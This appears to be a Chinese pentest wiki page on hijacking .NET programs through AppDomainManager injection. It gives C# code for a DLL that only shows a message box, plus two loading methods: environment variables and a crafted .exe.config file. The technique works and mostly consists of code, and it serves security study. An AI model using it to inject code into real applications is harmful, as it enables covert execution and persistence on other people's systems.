劫持.NET程序

劫持.NET程序(AppDomainManager)

首先制作要加载的恶意程序

C#:

using System;
using System.Windows.Forms;
public sealed class MyAppDomainManager : AppDomainManager
{
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        MessageBox.Show("AppDomainManager Injection");
        return;
    }
}

之后将其编译为qwqdanchun.dll。

注入方法一:

命令行设置环境变量:

set APPDOMAIN_MANAGER_ASM=qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager

之后将qwqdanchun.dll与.net文件放在同一目录即可。

注入方法二:

寻找要注入的exe文件(此处示例使用qwqdanchun.exe),并将做好的dll与其置于同一目录,再将如下配置文件写入qwqdanchun.exe.config文件即可。

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>
  </startup>
    <runtime>
      <appDomainManagerAssembly value="qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
      <appDomainManagerType value="MyAppDomainManager" />
    </runtime>
</configuration>

参考文章:

LogoAttacking the CLR - AppDomainManager Injection
LogoAppDomainManager Injection – Pentest LaboratoriesPentest Laboratories

上一页劫持自启动程序下一页NTFS短文件名

最后更新于

这有帮助吗?